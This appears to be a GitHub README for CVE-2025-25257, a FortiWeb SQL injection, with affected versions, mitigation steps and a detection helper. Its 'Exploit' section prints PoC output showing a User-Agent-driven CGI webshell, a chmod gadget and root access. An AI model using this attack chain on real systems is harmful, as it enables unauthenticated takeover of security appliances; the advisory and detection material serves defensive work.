# CVE-2025-25257 — FortiWeb Critical SQL Injection Vulnerability 🔥
<img width="665" height="375" alt="bug-removebg-preview" src="https://github.com/user-attachments/assets/57839369-cdde-4166-ba13-cf5a9ff978ad" />
### 🧠 Overview:
* **Vulnerability Type**: Unauthenticated **SQL Injection**
* **Component Affected**: FortiWeb GUI / Fabric Connector API
* **CVSS Score**: **9.6 – 9.8 (Critical)**
* **CWE**: CWE-89 – Improper Neutralization of Special Elements in SQL Commands
* **Discovered & Patched**: July 2025
* **Exploitation Status**: Proof-of-concept publicly available; exploitation expected
---
### 🛠 Affected Versions:
| FortiWeb Version | Affected Range | Fixed Version |
| ---------------- | --------------- | --------------- |
| 7.6 | 7.6.0 to 7.6.3 | 7.6.4 or later |
| 7.4 | 7.4.0 to 7.4.7 | 7.4.8 or later |
| 7.2 | 7.2.0 to 7.2.10 | 7.2.11 or later |
| 7.0 | 7.0.0 to 7.0.10 | 7.0.11 or later |
---
### 🚨 Technical Details:
* The vulnerability allows attackers to **inject SQL** into HTTP/S requests without any login.
* One of the vulnerable endpoints is `/api/fabric/device/status`, where SQL payloads in the `Authorization: Bearer` header can be executed.
* Potential impact includes **full database compromise**, **data theft**, or **remote code execution** via `SELECT … INTO OUTFILE` or similar techniques.
---
### 🔐 Risk:
* **Attack Vector**: Remote, no authentication required
* **Impact**: Full access to FortiWeb backend DB, possible system compromise
* **Threat Level**: **Critical** — especially since FortiWeb is a security appliance
---
### 🧩 Mitigation Steps:
1. **Patch immediately** to the fixed version corresponding to your FortiWeb release.
2. **Restrict or disable HTTP/HTTPS access** to the management interface temporarily.
3. **Monitor logs** for suspicious API calls or Bearer token injections.
4. **Audit internet-facing FortiWeb appliances** and isolate if unpatched.
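As an added example (not part of this repository or the PoC script), a small triage helper that applies the affected-version table above and flags API requests whose `Authorization: Bearer` value carries SQL syntax toward the vulnerable endpoint. The request records and their field names (`path`, `authorization`) are constructed for illustration and are not FortiWeb's native log format.

```python
import re
from typing import Optional

# Affected ranges and fixed versions taken from the advisory table.
# Each entry: "major.minor" -> (last affected patch level, fixed version)
AFFECTED = {
    "7.6": (3, "7.6.4"),
    "7.4": (7, "7.4.8"),
    "7.2": (10, "7.2.11"),
    "7.0": (10, "7.0.11"),
}

def parse_version(version: str) -> tuple[int, int, int]:
    """Parse a FortiWeb version string such as '7.4.3' into integers."""
    parts = version.strip().split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised version string: {version!r}")
    major, minor, patch = (int(p) for p in parts)
    return major, minor, patch

def required_fix(version: str) -> Optional[str]:
    """Return the version to upgrade to, or None if this release is not affected."""
    major, minor, patch = parse_version(version)
    entry = AFFECTED.get(f"{major}.{minor}")
    if entry is None:
        return None  # branch not listed in the advisory
    last_affected, fixed = entry
    return fixed if patch <= last_affected else None

# A legitimate bearer token is one opaque string; quotes, comment markers or
# SQL keywords inside it are a strong signal of probing against this endpoint.
ENDPOINT = "/api/fabric/device/status"
SQLI_MARKERS = re.compile(r"['\"`;]|--|/\*|\b(select|union|or|and)\b", re.I)

def suspicious_bearer(record: dict) -> bool:
    """Flag a request record whose Bearer token looks like an injection attempt."""
    if record.get("path", "").split("?")[0] != ENDPOINT:
        return False
    auth = record.get("authorization", "")
    if not auth.lower().startswith("bearer "):
        return False
    return bool(SQLI_MARKERS.search(auth[7:]))

def flagged_requests(records: list[dict]) -> list[dict]:
    """Return only the records worth an analyst's attention."""
    return [r for r in records if suspicious_bearer(r)]

SAMPLE_REQUESTS = [  # constructed sample records, not captured traffic
    {"path": ENDPOINT, "authorization": "Bearer 3f9c2a1b7e"},
    {"path": ENDPOINT, "authorization": "Bearer abc' or 1=1 -- "},
    {"path": "/api/v2/system/status", "authorization": "Bearer x' union select 1"},
]
```

Only requests to the fabric endpoint are scored, so the third sample record is left for other rules rather than reported here.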
---
### ✅ TL;DR:
* CVE-2025-25257 is a **critical unauthenticated SQL injection** in FortiWeb.
* Patch now to versions: **7.6.4+, 7.4.8+, 7.2.11+, or 7.0.11+**.
* If unpatched, disable external access to the management GUI.
* Exploitation is likely—treat this as a top priority.
---
### 💀 Exploit:
<img width="1920" height="958" alt="bug1" src="https://github.com/user-attachments/assets/fb8db3c1-e26f-46d4-a247-f7a44f7d332e" />
```
┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-25257.py -t https://10.10.10.10:9443/
[*] writing part #!/bin/sh --
p
[*] writing part rintf "Content-T
[*] writing part ype: text/html\r
[*] writing part \n";printf "\r\n
[*] writing part ";eval $HTTP_USE
[*] writing part R_AGENT
[>] writing webshell file
[*] writing part import os #
os
[*] writing part .system('chmod +
[*] writing part x /migadmin/cgi-
[*] writing part bin/x.cgi && rm
[*] writing part -f /var/log/lib/
[*] writing part python3.10/pylab
[*] writing part .py') #
[>] cooking chmod gadget
[*] triggering chmod
[*] executing `id` ...
uid=0(root) gid=0 groups=0
[*] webshell available at:
> https://10.10.10.10:9443/cgi-bin/x.cgi
provide command via the `User-Agent` header!)
```
---
### ⚠️ Disclaimer:
This information is provided for **educational and defensive security purposes only**. Any actions taken using this knowledge must comply with **all applicable laws and ethical standards**. Unauthorized exploitation of systems without explicit permission is **illegal and unethical**. The author assumes **no responsibility** for any misuse or damage resulting from the use of this content.